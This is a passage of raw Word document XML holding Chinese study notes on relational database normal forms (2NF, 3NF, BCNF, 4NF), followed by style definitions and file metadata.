        <w:t>每一个分量必须是不可分的数据项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2NF——</w:t>
      </w:r>
      <w:r>
        <w:t>每一个非主属性</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>完全</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>函数依赖于</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>任何</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>一个候选码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>如果不满足</w:t>
      </w:r>
      <w:r>
        <w:t>2NF</w:t>
      </w:r>
      <w:r>
        <w:t>，则说明这个数据库的设计有问题，范例就是将两个设计符合</w:t>
      </w:r>
      <w:r>
        <w:t>2NF</w:t>
      </w:r>
      <w:r>
        <w:t>的表合在一起，插入的时候可能会缺乏数据，删除的时候会删除意料之外的部分（两个表结合在一起），修改的时候会比较复杂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3NF——</w:t>
      </w:r>
      <w:r>
        <w:t>只消除非主属性对主属性的传递依赖；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>BCNF——</w:t>
      </w:r>
      <w:r>
        <w:t>消除所有属性对主属性的传递依赖。完全消除了由于函数依赖带来的过度冗余及相应的三类问题</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>插入、删除、修改时产生的复杂以及错误</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">4NF—— </w:t>
      </w:r>
      <w:r>
        <w:t>属性之间不允许有非平凡且非函数依赖的多值依赖（只能函数依赖或者平凡的多值依赖）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>其实多值字段可以直接用</w:t>
      </w:r>
      <w:r>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>实现，每一个数据之间使用特定的符号隔开就好。</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00523480">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ADF" w:rsidRDefault="00D60ADF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D60ADF" w:rsidRDefault="00D60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F Pro Display">
    <w:altName w:val="Arial"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:altName w:val="Noto Sans Syriac Eastern"/>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ADF" w:rsidRDefault="00D60ADF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D60ADF" w:rsidRDefault="00D60A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1619E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5101619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5CB73F47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CB73F47"/>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B2"/>
    <w:rsid w:val="EBD3C209"/>
    <w:rsid w:val="EC9E4940"/>
    <w:rsid w:val="ECF9446D"/>
    <w:rsid w:val="EDFDD8F1"/>
    <w:rsid w:val="EEF74883"/>
    <w:rsid w:val="EF075F25"/>
    <w:rsid w:val="EF7F348A"/>
    <w:rsid w:val="EFBD78E6"/>
    <w:rsid w:val="F0DDD782"/>
    <w:rsid w:val="F57F7754"/>
    <w:rsid w:val="F59B700A"/>
    <w:rsid w:val="F6F6A933"/>
    <w:rsid w:val="F6F779D3"/>
    <w:rsid w:val="F714E9EB"/>
    <w:rsid w:val="F7FDEB26"/>
    <w:rsid w:val="F7FE1606"/>
    <w:rsid w:val="F7FE404D"/>
    <w:rsid w:val="F9F37095"/>
    <w:rsid w:val="FAEEA199"/>
    <w:rsid w:val="FAF546D7"/>
    <w:rsid w:val="FB970F9D"/>
    <w:rsid w:val="FCE9F2D1"/>
    <w:rsid w:val="FD3F476F"/>
    <w:rsid w:val="FDA7DAD8"/>
    <w:rsid w:val="FEB76E55"/>
    <w:rsid w:val="FED785AF"/>
    <w:rsid w:val="FEFC7FA4"/>
    <w:rsid w:val="FF27E3BF"/>
    <w:rsid w:val="FFBA4901"/>
    <w:rsid w:val="FFD79F95"/>
    <w:rsid w:val="000368C1"/>
    <w:rsid w:val="00150D18"/>
    <w:rsid w:val="00164007"/>
    <w:rsid w:val="001A20E7"/>
    <w:rsid w:val="00265B70"/>
    <w:rsid w:val="004222B9"/>
    <w:rsid w:val="00450EFF"/>
    <w:rsid w:val="00523480"/>
    <w:rsid w:val="005C6FDE"/>
    <w:rsid w:val="005E58C5"/>
    <w:rsid w:val="00713870"/>
    <w:rsid w:val="008852B2"/>
    <w:rsid w:val="00901759"/>
    <w:rsid w:val="009A3798"/>
    <w:rsid w:val="00D60ADF"/>
    <w:rsid w:val="00DE2B25"/>
    <w:rsid w:val="00DE2E98"/>
    <w:rsid w:val="00E05872"/>
    <w:rsid w:val="0F473A1F"/>
    <w:rsid w:val="1397BE98"/>
    <w:rsid w:val="17D5ED71"/>
    <w:rsid w:val="27EF02CA"/>
    <w:rsid w:val="27FF1A34"/>
    <w:rsid w:val="28D723BD"/>
    <w:rsid w:val="2F99E205"/>
    <w:rsid w:val="37DB5D8D"/>
    <w:rsid w:val="37F6B850"/>
    <w:rsid w:val="39F8BDFD"/>
    <w:rsid w:val="3B5F6B90"/>
    <w:rsid w:val="3BE50551"/>
    <w:rsid w:val="3BE984A8"/>
    <w:rsid w:val="3D9F547A"/>
    <w:rsid w:val="3DD3A2E6"/>
    <w:rsid w:val="3F5F9B41"/>
    <w:rsid w:val="3F7F379F"/>
    <w:rsid w:val="3FFB49F6"/>
    <w:rsid w:val="3FFC6E4C"/>
    <w:rsid w:val="49081E5A"/>
    <w:rsid w:val="497D3441"/>
    <w:rsid w:val="4B5F827F"/>
    <w:rsid w:val="4BFEAB80"/>
    <w:rsid w:val="4D7FE8EE"/>
    <w:rsid w:val="5124F4D0"/>
    <w:rsid w:val="55FF0024"/>
    <w:rsid w:val="58FF2CD0"/>
    <w:rsid w:val="5B1BE378"/>
    <w:rsid w:val="5CCA8C81"/>
    <w:rsid w:val="5DAEF1C8"/>
    <w:rsid w:val="5DFF8424"/>
    <w:rsid w:val="5E6E1A89"/>
    <w:rsid w:val="5F3F91E4"/>
    <w:rsid w:val="5F9E34DB"/>
    <w:rsid w:val="5FEB5A98"/>
    <w:rsid w:val="625BF4DE"/>
    <w:rsid w:val="672E6153"/>
    <w:rsid w:val="69FD28F9"/>
    <w:rsid w:val="6A6FBC4B"/>
    <w:rsid w:val="6A7DCB01"/>
    <w:rsid w:val="6B5B89FC"/>
    <w:rsid w:val="6BBB3E2F"/>
    <w:rsid w:val="6BF5F597"/>
    <w:rsid w:val="6E3F6108"/>
    <w:rsid w:val="6F932485"/>
    <w:rsid w:val="6FFF6FA1"/>
    <w:rsid w:val="737F8913"/>
    <w:rsid w:val="73F78747"/>
    <w:rsid w:val="75EB3565"/>
    <w:rsid w:val="75FBF4C0"/>
    <w:rsid w:val="75FF847B"/>
    <w:rsid w:val="76D2E609"/>
    <w:rsid w:val="77DAB5EC"/>
    <w:rsid w:val="77DFBA73"/>
    <w:rsid w:val="792F30A7"/>
    <w:rsid w:val="7AF74D2F"/>
    <w:rsid w:val="7B2DBB4C"/>
    <w:rsid w:val="7B4FA4CA"/>
    <w:rsid w:val="7B7CD518"/>
    <w:rsid w:val="7BCBE65D"/>
    <w:rsid w:val="7BF73FDB"/>
    <w:rsid w:val="7BFE6444"/>
    <w:rsid w:val="7BFF062B"/>
    <w:rsid w:val="7E2445F1"/>
    <w:rsid w:val="7EB79C41"/>
    <w:rsid w:val="7EBF9F17"/>
    <w:rsid w:val="7F1BF401"/>
    <w:rsid w:val="7F3E50F8"/>
    <w:rsid w:val="7F7F634D"/>
    <w:rsid w:val="7F7FECD9"/>
    <w:rsid w:val="7FABD82C"/>
    <w:rsid w:val="7FB5A9B4"/>
    <w:rsid w:val="7FDBE885"/>
    <w:rsid w:val="7FFD423A"/>
    <w:rsid w:val="7FFD5E40"/>
    <w:rsid w:val="7FFFE253"/>
    <w:rsid w:val="97FFB301"/>
    <w:rsid w:val="99FDC5A1"/>
    <w:rsid w:val="A9FB2A58"/>
    <w:rsid w:val="A9FFBD60"/>
    <w:rsid w:val="B17AA972"/>
    <w:rsid w:val="B3DF0797"/>
    <w:rsid w:val="B7BDE8BC"/>
    <w:rsid w:val="B7D95C1D"/>
    <w:rsid w:val="B7FC695D"/>
    <w:rsid w:val="BBBBB0CB"/>
    <w:rsid w:val="BEFF37CF"/>
    <w:rsid w:val="BFAF9730"/>
    <w:rsid w:val="BFD772E9"/>
    <w:rsid w:val="BFE8C0F5"/>
    <w:rsid w:val="CBBDBE73"/>
    <w:rsid w:val="CECDEC2E"/>
    <w:rsid w:val="D3DB809F"/>
    <w:rsid w:val="D8E82E31"/>
    <w:rsid w:val="D9FF6857"/>
    <w:rsid w:val="DEDDA625"/>
    <w:rsid w:val="DEEDAD38"/>
    <w:rsid w:val="DFBD2932"/>
    <w:rsid w:val="DFBFFB51"/>
    <w:rsid w:val="DFDE993F"/>
    <w:rsid w:val="DFDF38D0"/>
    <w:rsid w:val="DFDFFA54"/>
    <w:rsid w:val="DFE53021"/>
    <w:rsid w:val="E3D19EC7"/>
    <w:rsid w:val="E8FB3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CF5C870-19D5-41E1-8B59-D6406C3C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sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:next w:val="a"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>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paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML0">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1">
    <w:name w:val="列表段落1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="bjh-p">
    <w:name w:val="bjh-p"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>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b-engines.com/en/ranking/time+series+dbm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stackoverflow.com/questions/3513773/change-mysql-default-character-set-to-utf-8-in-my-cn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54</Pages>
  <Words>9208</Words>
  <Characters>52492</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>437</Lines>
  <Paragraphs>123</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>61577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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-12T09:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-06T08:58:00Z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